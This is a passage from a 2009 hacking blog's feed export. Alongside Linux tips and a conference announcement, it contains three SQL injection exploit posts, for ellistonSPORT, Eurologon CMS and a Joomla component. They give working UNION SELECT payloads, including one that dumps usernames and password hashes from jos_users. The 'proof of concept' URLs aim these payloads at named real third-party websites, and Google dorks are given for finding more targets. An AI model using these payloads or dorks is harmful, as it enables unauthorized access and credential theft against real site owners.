href="http://3.bp.blogspot.com/_dxtzvQwAPwE/SyeOntuXQPI/AAAAAAAAAEw/Tt56uphpdms/s1600-h/3.png"&gt;&lt;img style="cursor: pointer; width: 263px; height: 320px;" src="http://3.bp.blogspot.com/_dxtzvQwAPwE/SyeOntuXQPI/AAAAAAAAAEw/Tt56uphpdms/s320/3.png" alt="" id="BLOGGER_PHOTO_ID_5415453889876410610" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;now put your tunnel info into &lt;span style="font-weight: bold;"&gt;Tunnel configuration&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_dxtzvQwAPwE/SyeO0Fs23kI/AAAAAAAAAE4/OKesH4nDpoY/s1600-h/4.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 267px;" src="http://4.bp.blogspot.com/_dxtzvQwAPwE/SyeO0Fs23kI/AAAAAAAAAE4/OKesH4nDpoY/s320/4.png" alt="" id="BLOGGER_PHOTO_ID_5415454102470975042" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;after that click &lt;span style="font-weight: bold;"&gt;Add&lt;/span&gt; on &lt;span style="font-weight: bold;"&gt;Port redirection&lt;/span&gt;&lt;br /&gt;choose &lt;span style="font-weight: bold;"&gt;dynamic&lt;/span&gt; and port is up to you then click &lt;span style="font-weight: bold;"&gt;OK&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_dxtzvQwAPwE/SyePAANCXoI/AAAAAAAAAFA/9p-hjgHgdDg/s1600-h/5.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 266px;" src="http://4.bp.blogspot.com/_dxtzvQwAPwE/SyePAANCXoI/AAAAAAAAAFA/9p-hjgHgdDg/s320/5.png" alt="" id="BLOGGER_PHOTO_ID_5415454307153763970" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;now back to the front again and click &lt;span style="font-weight: bold;"&gt;Start&lt;/span&gt;&lt;br /&gt;you will be promt tunnel password, fill the password and click &lt;span style="font-weight: bold;"&gt;OK&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_dxtzvQwAPwE/SyePKi9UlQI/AAAAAAAAAFI/-ckbfJtbwRM/s1600-h/6.png"&gt;&lt;img style="cursor: pointer; width: 265px; height: 320px;" src="http://4.bp.blogspot.com/_dxtzvQwAPwE/SyePKi9UlQI/AAAAAAAAAFI/-ckbfJtbwRM/s320/6.png" alt="" id="BLOGGER_PHOTO_ID_5415454488281781506" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;if the light green it means your tunnel is running&lt;br /&gt;&lt;br /&gt;now setting the firefox configuration&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Edit&lt;/span&gt; &gt;&gt; &lt;span style="font-weight: bold;"&gt;Preferences&lt;/span&gt; &gt;&gt; &lt;span style="font-weight: bold;"&gt;Network&lt;/span&gt; &gt;&gt; &lt;span style="font-weight: bold;"&gt;Settings&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;choose &lt;span style="font-weight: bold;"&gt;Manual proxy configuration&lt;/span&gt;&lt;br /&gt;go to &lt;span style="font-weight: bold;"&gt;SOCKS Host&lt;/span&gt; and put localhost set the &lt;span style="font-weight: bold;"&gt;Port&lt;/span&gt; with dynamic port that we add in gSTM (12345)&lt;br /&gt;and click &lt;span style="font-weight: bold;"&gt;OK&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_dxtzvQwAPwE/SyePUGFQfVI/AAAAAAAAAFQ/9qsuSrD3TfE/s1600-h/7.png"&gt;&lt;img style="cursor: pointer; width: 302px; height: 320px;" src="http://2.bp.blogspot.com/_dxtzvQwAPwE/SyePUGFQfVI/AAAAAAAAAFQ/9qsuSrD3TfE/s320/7.png" alt="" id="BLOGGER_PHOTO_ID_5415454652329131346" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;this is my IP now&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_dxtzvQwAPwE/SyePgz6L6dI/AAAAAAAAAFY/dPDjiJdGyoU/s1600-h/8.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 240px;" src="http://4.bp.blogspot.com/_dxtzvQwAPwE/SyePgz6L6dI/AAAAAAAAAFY/dPDjiJdGyoU/s320/8.png" alt="" id="BLOGGER_PHOTO_ID_5415454870789155282" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;happy browsing!! ^^&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;greetz to c0li &amp;amp; zxvf&lt;br /&gt;./NoGe&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-948964376668022575?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/948964376668022575/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=948964376668022575' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/948964376668022575'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/948964376668022575'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/12/ssh-tunnel-with-gstm-in-ubuntu.html' title='SSH Tunnel with gSTM in ubuntu'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_dxtzvQwAPwE/SyeNsCiuGcI/AAAAAAAAAEg/DkJZ3vBOLFU/s72-c/1.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-4434489619764052188</id><published>2009-12-12T18:34:00.004+07:00</published><updated>2009-12-12T18:56:15.046+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>ellistonSPORT Multiple SQL Injection Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] ellistonSPORT Multiple SQL Injection Vulnerability&lt;br /&gt;&lt;/span&gt;Software : ellistonSPORT&lt;br /&gt;Vendor   : http://ellistonsport.com/&lt;br /&gt;Demo     : http://demo.ellistonsport.com/index.php&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Description&lt;/span&gt;&lt;br /&gt;&lt;strong style="font-weight: normal;"&gt;&lt;/strong&gt;&lt;strong style="font-weight: normal;"&gt;ellistonSPORT is a leading online service providing&lt;br /&gt;professionally designed, easy to update websites for sports clubs and&lt;br /&gt;teams around the world.&lt;/strong&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Vulnerable file&lt;br /&gt;&lt;/span&gt;showPlayer.php&lt;br /&gt;showPage.php&lt;br /&gt;showNews.php&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;&lt;br /&gt;[o] Exploit&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/&lt;/span&gt;showPlayer.php&lt;span class="fullpost"&gt;?id=[SQL]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/&lt;/span&gt;showPage.php&lt;span class="fullpost"&gt;?id=[SQL]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/showNews.php?id=[SQL]&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Proof of Concept&lt;/span&gt;&lt;br /&gt;http://garndiffaithrfc.com/showPlayer.php?id=101+AND+1=2+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,database()--&lt;br /&gt;http://www.rbscrusaders.com/showPage.php?id=10+AND+1=2+UNION+SELECT+1,version(),database(),4--&lt;br /&gt;http://www.romafc.co.uk/showNews.php?id=363+AND+1=2+UNION+SELECT+1,version(),database(),4,5,6,7--&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"Powered by ellistonSPORT"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Notes&lt;/span&gt;&lt;br /&gt;this is a private script and all target are in one IP address.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-4434489619764052188?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/4434489619764052188/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=4434489619764052188' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4434489619764052188'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4434489619764052188'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/12/ellistonsport-multiple-sql-injection.html' title='ellistonSPORT Multiple SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-5899006715788744475</id><published>2009-12-09T20:02:00.002+07:00</published><updated>2009-12-09T20:13:50.761+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Eurologon CMS SQL Injection Vuln</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] Eurologon CMS SQL Injection Vulnerability&lt;/span&gt;&lt;br /&gt;Software : Eurologon Content Management System&lt;br /&gt;Vendor   : http://www.content-manager.it/&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;links.php&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/links.php?id=[SQL]&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Proof of concept&lt;/span&gt;&lt;br /&gt;http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*&lt;br /&gt;http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"Powered by Eurologon"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Notes&lt;/span&gt;&lt;br /&gt;this is a private script.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-5899006715788744475?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/5899006715788744475/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=5899006715788744475' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/5899006715788744475'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/5899006715788744475'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/12/eurologon-cms-sql-injection-vuln.html' title='Eurologon CMS SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-473726411627316771</id><published>2009-12-03T23:44:00.002+07:00</published><updated>2009-12-03T23:52:34.221+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Components [ com_dm_orders ] SQL Injection Vuln</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] com_dm_orders SQL Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_dm_orders [ joomla components ]&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_dm_orders&amp;task=order_form&amp;payment_method=Paypal&amp;id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&amp;Itemid=1&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Proof Of Concept&lt;/span&gt;&lt;br /&gt;http://www.shop.isecure-key.com/index.php?option=com_dm_orders&amp;task=order_form&amp;payment_method=Paypal&amp;id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&amp;Itemid=54&lt;br /&gt;http://www.bluesplayer.dk/index.php?option=com_dm_orders&amp;task=order_form&amp;payment_method=Paypal&amp;id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&amp;Itemid=56&lt;br /&gt;http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&amp;task=order_form&amp;payment_method=Paypal&amp;id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&amp;Itemid=54&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-473726411627316771?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/473726411627316771/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=473726411627316771' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/473726411627316771'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/473726411627316771'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/12/joomla-components-comdmorders-sql.html' title='Joomla Components [ com_dm_orders ] SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6852345486336734922</id><published>2009-11-23T09:50:00.003+07:00</published><updated>2009-11-23T10:03:51.138+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><title type='text'>Flash player on Flock [solved]</title><content type='html'>hey yoo all.. :))&lt;br /&gt;&lt;br /&gt;what the F is Flock?&lt;br /&gt;&lt;br /&gt;Flock is a browser. The people here at Flock are committed to building a browser unlike anything you’ve ever experienced before - because we start by focusing on user needs. We take pride in solving for common behaviors on the Web that seem clunky today, and will seem ridiculous tomorrow. We’re taking you there.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;taken from http://www.flock.com/about&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;are you having problem with flash player on Flock browser?&lt;br /&gt;well i do have problem with that shit.&lt;br /&gt;so lets have a look how to solved this problem..&lt;br /&gt;btw, im using Ubuntu and Flock 2.0.3&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;all you have to do is install flash player first.&lt;br /&gt;&lt;br /&gt;$ sudo apt-get install flashplugin-nonfree&lt;br /&gt;&lt;br /&gt;if your flash player already installed than you can run this command on terminal&lt;br /&gt;&lt;br /&gt;$ sudo ln /usr/lib/flashplugin-nonfree/libflashplayer.so /usr/share/flock/plugins/libflashplayer.so&lt;br /&gt;&lt;br /&gt;restart your Flock browser and have a nice day!! ^^&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6852345486336734922?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6852345486336734922/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6852345486336734922' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6852345486336734922'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6852345486336734922'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/11/flash-player-on-flock-solved.html' title='Flash player on Flock [solved]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1235701975297864079</id><published>2009-10-16T07:37:00.007+07:00</published><updated>2009-10-29T20:32:34.787+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>InDonesian SECurity CONFerence 2009 [ idsecconf 2009 ]</title><content type='html'>&lt;pre&gt;&lt;a href="http://idsecconf.org/" target="_blank"&gt;&lt;img alt="Dengan bangga mendukung kegiatan idsecconf 2009" src="http://images.idsecconf.org/2009/320x169.png" title="Dengan bangga mendukung terlaksananya idsecconf 2009" height="169" width="320" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[ Keynote ]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;Onno W Purbo&lt;/a&gt; - (TBA) - Sedang Dalam Konfirmasi&lt;br /&gt;2] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;Pihak Universitas Al Azhar Indonesia&lt;/a&gt; - (TBA)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[ Pembicara ]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;Dfox&lt;/a&gt; - (&lt;span style="font-style: italic;"&gt;A Day To ShutDown Indonesian Internet Core Routing&lt;/span&gt;)&lt;br /&gt;"Pada presentasi ini akan membahas mengenai celah keamanan Border&lt;br /&gt;Gateway Protocol (BGP) yang banyak dimanfaatkan oleh router ISP di&lt;br /&gt;Indonesia, disertai Demo sederhana menggunakan Dynamips"&lt;br /&gt;&lt;br /&gt;2] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;The hydra&lt;/a&gt; - (&lt;span style="font-style: italic;"&gt;Bagaimana menulis dan memaintain electronic hacking magazine&lt;/span&gt;)&lt;br /&gt;"Presentasi ini akan mengajak kita bersama-sama mengulas lebih jauh&lt;br /&gt;mengenai bagaimana menulis artikel hacking (yang merupakan titik lemah&lt;br /&gt;kita) dan memaintain sebuah majalah elektronik ber-genre hacking"&lt;br /&gt;&lt;br /&gt;3] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;Eadi&lt;/a&gt;, &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;k_blacklist_k&lt;/a&gt; - (&lt;span style="font-style: italic;"&gt;Computer Security Educational Demo for High School Students&lt;/span&gt;)&lt;br /&gt;- "Presentasi ini akan memfokuskan dan mendemokan berbagai skenario&lt;br /&gt;yang akan dapat membantu para Siswa SMU untuk dapat mulai mengerti&lt;br /&gt;Bidang mana dari Ilmu komputer yang mereka sukai "&lt;br /&gt;&lt;br /&gt;4] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;Grindstone&lt;/a&gt; - (&lt;span style="font-style: italic;"&gt;Dasar Dasar Keygenning&lt;/span&gt;)&lt;br /&gt;- "Presentasi ini akan mengajak kita untuk lebih memahami proses&lt;br /&gt;pembuatan Key Generator dari suatu aplikasi, pelajaran mendalam&lt;br /&gt;mengenai Software Reverse engineering yang akan mengajak kita membangun&lt;br /&gt;kode yang lebih kuat atau mulai mengalihkan pilihan ke lisensi terbuka&lt;br /&gt;(opensource)"&lt;br /&gt;&lt;br /&gt;5] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;Endy&lt;/a&gt;, &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;Yan&lt;/a&gt; - (&lt;span style="font-style: italic;"&gt;Implementasi Algoritma Stream Cipher Rabbit Pada Protokol Secure Socket Layer (SSL)&lt;/span&gt;)&lt;br /&gt;- "Presentasi ini menjabarkan mengenai Implementasi algoritma Stream&lt;br /&gt;Cipher Rabbit pada Protocol Secure Socket Layer serta implikasi yang&lt;br /&gt;timbul, serta perbandingan performa dengan berbagai algoritma standard&lt;br /&gt;yang umum di gunakan (RC4, AES, dsb)"&lt;br /&gt;&lt;br /&gt;6] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;Anton&lt;/a&gt; - (&lt;span style="font-style: italic;"&gt;Selling Pictures in Auction Site ( New Way of South East Asia Scam )&lt;/span&gt;)&lt;br /&gt;- "Presentasi ini akan membahas salah satu bentuk kejahatan dunia maya Scamming&lt;br /&gt;yang sedang menjadi tren di Asia Tenggara "&lt;br /&gt;&lt;br /&gt;7] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;MrX&lt;/a&gt; - (&lt;span style="font-style: italic;"&gt;ADT: It's not about Faking the Approval&lt;/span&gt;)&lt;br /&gt;- "Presentasi ini akan menjelaskan mengenai celah-celah dalam&lt;br /&gt;Perbelanjaan Online yang saat ini sudah menjadi tren dan kebiasaan&lt;br /&gt;(disertai berbagai contoh) mengakibatkan peningkatan kejahatan dunia&lt;br /&gt;maya, seperti pencurian identitas, dan kejahatan penggunaan Kartu&lt;br /&gt;kredit akan membuka wawasan kita dalam melindungi diri"&lt;br /&gt;&lt;br /&gt;8] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;BelagaBego&lt;/a&gt; - (&lt;span style="font-style: italic;"&gt;CROUCHING NETBOOK HIDDEN BACKTRACK: "wireless Man-in-the middle with 3G Touchsreen EEEPC&lt;/span&gt;)&lt;br /&gt;- "Sering kali untuk menjadi seorang pentester atau security&lt;br /&gt;profesional, mobilitas dan aktifitas BlackBox sering diperlukan.&lt;br /&gt;Computer yang dibawa haruslah tidak ribet, full compatible software dan&lt;br /&gt;mampu ditweaking. dengan menggunakan netbook EEEPC 701, kita akan&lt;br /&gt;mengubahnya menjadi the most powerfull hacking toys untuk keperluan&lt;br /&gt;pentesting.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[ Diskusi panel&lt;/span&gt; ]&lt;br /&gt;&lt;br /&gt;1] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;&lt;span style="font-weight: bold;"&gt;Seberapa Siapkah Indonesia menghadapi Cyber War&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;(&lt;span style="font-style: italic;"&gt;Komunitas Underground Indonesia&lt;/span&gt;)&lt;br /&gt;&lt;br /&gt;2] &lt;a href="http://2009.idsecconf.org/2009/10/jadwal-kegiatan-2-hari.html"&gt;&lt;span style="font-weight: bold;"&gt;Regenerasi Hacker?&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;(&lt;span style="font-style: italic;"&gt;Komunitas Underground Indonesia&lt;/span&gt;)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[ Capture The Flag (CTF) Hacking Contest&lt;/span&gt; ]&lt;br /&gt;&lt;br /&gt;Permainan Hacking dengan hadiah yang tidak akan dapat anda bayangkan :)&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;input id="gwProxy" type="hidden"&gt;&lt;!--Session data--&gt;&lt;input onclick="jsCall();" id="jsProxy" type="hidden"&gt;&lt;div id="refHTML"&gt;&lt;/div&gt;&lt;input id="gwProxy" type="hidden"&gt;&lt;!--Session data--&gt;&lt;input onclick="jsCall();" id="jsProxy" type="hidden"&gt;&lt;div id="refHTML"&gt;&lt;/div&gt;&lt;input id="gwProxy" type="hidden"&gt;&lt;!--Session data--&gt;&lt;input onclick="jsCall();" id="jsProxy" type="hidden"&gt;&lt;div id="refHTML"&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1235701975297864079?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1235701975297864079/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1235701975297864079' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1235701975297864079'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1235701975297864079'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/10/indonesian-security-conference-2009.html' title='InDonesian SECurity CONFerence 2009 [ idsecconf 2009 ]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-5908404750805072682</id><published>2009-10-15T00:36:00.005+07:00</published><updated>2009-10-15T01:05:31.877+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><title type='text'>ubuntu GRUB Error 17 [solved]</title><content 